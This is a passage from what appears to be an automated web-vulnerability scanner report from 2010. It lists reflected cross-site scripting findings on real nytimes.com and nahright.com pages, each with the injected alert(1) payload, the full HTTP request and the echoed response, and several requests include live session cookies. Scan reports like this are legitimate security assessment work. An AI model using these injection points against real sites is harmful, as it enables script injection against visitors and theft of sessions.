The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea22b"><script>alert(1)</script>b2be1849c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:01 GMT
Content-type: text/html
Content-Length: 73539

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1&pagewanted=print">
...[SNIP]...

3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12unstop.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a87"><script>alert(1)</script>e87edf3b78 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:15 GMT
Content-type: text/html
Content-Length: 74735

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78&pagewanted=print">
...[SNIP]...

3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12unstop.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e5f"><script>alert(1)</script>7ccb997166a was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:11 GMT
Content-type: text/html
Content-Length: 74106

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a&pagewanted=print">
...[SNIP]...

3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/13/movies/13sky.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221ad"><script>alert(1)</script>f35b5011bda was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:34 GMT
Content-type: text/html
Content-Length: 72211

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda&pagewanted=print">
...[SNIP]...

3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/13/movies/13sky.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ea"><script>alert(1)</script>f474dec4118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:33 GMT
Content-type: text/html
Content-Length: 70797

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1&pagewanted=print">
...[SNIP]...

3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/movie/401469/Unstoppable/overview

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba18d"><script>alert(1)</script>494c7d4f0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movie/401469/Unstoppable/overview?ba18d"><script>alert(1)</script>494c7d4f0db=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:09 GMT
Content-type: text/html
Content-Length: 43755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Unstoppable - Trailer - Cast - Showtimes - NYTimes.com </title>

...[SNIP]...
<meta name="communityAssetTaxonomy" content="movie//Unstoppable?ba18d"><script>alert(1)</script>494c7d4f0db=1">
...[SNIP]...

3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nahright.com
Path:	/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a3bf</script><script>alert(1)</script>5635fe9c9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1 HTTP/1.1
Host: nahright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=PROMIRS192.168.100.41CKOMM; path=/
Date: Sat, 13 Nov 2010 02:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding
X-Pingback: http://nahright.com/news/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"nahright.com/news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/2010/11/11/a-republican-for-higher-taxes/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51c1"><script>alert(1)</script>380bf182eb4 was submitted in the src parameter. This input was echoed as b51c1\"><script>alert(1)</script>380bf182eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/a-republican-for-higher-taxes/?src=meb51c1"><script>alert(1)</script>380bf182eb4&ref=homepage HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:09:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Now1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;david-stockman;deficit;taxes;william-d-cohan&src=meb51c1\"><script>alert(1)</script>380bf182eb4">
...[SNIP]...

3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/2010/11/12/a-deficit-of-respect/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb5b"><script>alert(1)</script>23c8535c0f2 was submitted in the src parameter. This input was echoed as 1cb5b\"><script>alert(1)</script>23c8535c0f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/a-deficit-of-respect/?src=twr1cb5b"><script>alert(1)</script>23c8535c0f2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:08:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 72784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;alan-simpson;budget;erskine-bowles;federal-deficit;health-care-reform;social-security;taxes;the-thread&src=twr1cb5b\"><script>alert(1)</script>23c8535c0f2">
...[SNIP]...

3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/2010/11/12/the-ways-of-empathy/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ea26"><script>alert(1)</script>1e6f397c31 was submitted in the src parameter. This input was echoed as 4ea26\"><script>alert(1)</script>1e6f397c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-ways-of-empathy/?src=twr4ea26"><script>alert(1)</script>1e6f397c31 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:09:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 71082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;bullying;fixes;_featured&src=twr4ea26\"><script>alert(1)</script>1e6f397c31">
...[SNIP]...

3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/alec-soth

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62045"><script>alert(1)</script>d5bdd9c1f68 was submitted in the REST URL parameter 2. This input was echoed as 62045\"><script>alert(1)</script>d5bdd9c1f68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth62045"><script>alert(1)</script>d5bdd9c1f68 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth62045\"><script>alert(1)</script>d5bdd9c1f68&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/alec-soth/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddd1"><script>alert(1)</script>fc7205605c8 was submitted in the REST URL parameter 3. This input was echoed as bddd1\"><script>alert(1)</script>fc7205605c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth/feedbddd1"><script>alert(1)</script>fc7205605c8/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/feedbddd1\"><script>alert(1)</script>fc7205605c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/alec-soth/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43912"><script>alert(1)</script>d4a4c69cacb was submitted in the REST URL parameter 3. This input was echoed as 43912\"><script>alert(1)</script>d4a4c69cacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth/page43912"><script>alert(1)</script>d4a4c69cacb/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/page43912\"><script>alert(1)</script>d4a4c69cacb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/allison-arieff

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc60"><script>alert(1)</script>34ddd92904c was submitted in the REST URL parameter 2. This input was echoed as 8cc60\"><script>alert(1)</script>34ddd92904c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff8cc60"><script>alert(1)</script>34ddd92904c HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff8cc60\"><script>alert(1)</script>34ddd92904c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/allison-arieff/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd36"><script>alert(1)</script>75e2794e565 was submitted in the REST URL parameter 3. This input was echoed as 4fd36\"><script>alert(1)</script>75e2794e565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff/feed4fd36"><script>alert(1)</script>75e2794e565/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
